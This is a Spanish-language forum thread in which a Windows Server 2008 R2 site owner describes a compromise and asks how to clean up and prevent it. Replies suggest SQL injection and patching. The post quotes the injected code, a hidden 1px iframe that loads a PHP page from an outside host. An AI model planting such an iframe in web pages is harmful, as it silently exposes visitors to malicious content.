Ataque Servidore windows R2 2008

[Cronck]

Buenas tardes a todos, nuevamente me da gusto regresar a este foro.

En esta ocacion para consultar con ustedes un problema que he tenido en unos servidores, hace unos día tube un ataque a unos sitios que tengo en estos servidores, todos los nombres de los archivos están iguales, pero el contenido era distinto.

Dentro de ello habian 2 lineas similares a estas:

Código [Seleccionar] Expandir

<iframe width="1px" height="1px" src="http://ishigo.sytes.ne
t/openstat/appropriate/promise-ourselves.php" style="display
:block;" >

Restaure toda la informacion y 2 dias despues google me bloqueo el sitio por tener contenido malicioso, al revisar el index, footer y header del sitio en las ultimas lineas contenía el código anterior.

Actualmente estoy cambiando los sitios a otros servidores, para desechar estos con lo que tengo problemas.

Pero me surgen las siguientes dudas.

1.- Que tipo de ataque a sido este?
2.- Como saber si realmente la información esta limpia al pasarla al otro servidor y poder salir de la lista negra de google
3.- Como prevenir estos acontecimientos.

Realmente me sentí muy vulnerable, yo he usado linux mas de 10 años hacia atrás, y es mi primera ves que uso windows por requerimiento de estos sitios y no pude encontrar la solución del error.

Saludos y gracias por sus comentarios

[HRHDP]

Hola estas usando db en su sitio??
Puede que te Allan hecho un inyección Sql es lo único que se me ocurre.
Si ese código te lo insertaron en tu web.

[el-brujo]

Revisa si tienes el sistema actualizado.

Es muy habitual que añaden un 1 frame de 1px con código malicioso, lo que tienes que averiguar ahora es dónde está la vulnerabilidad.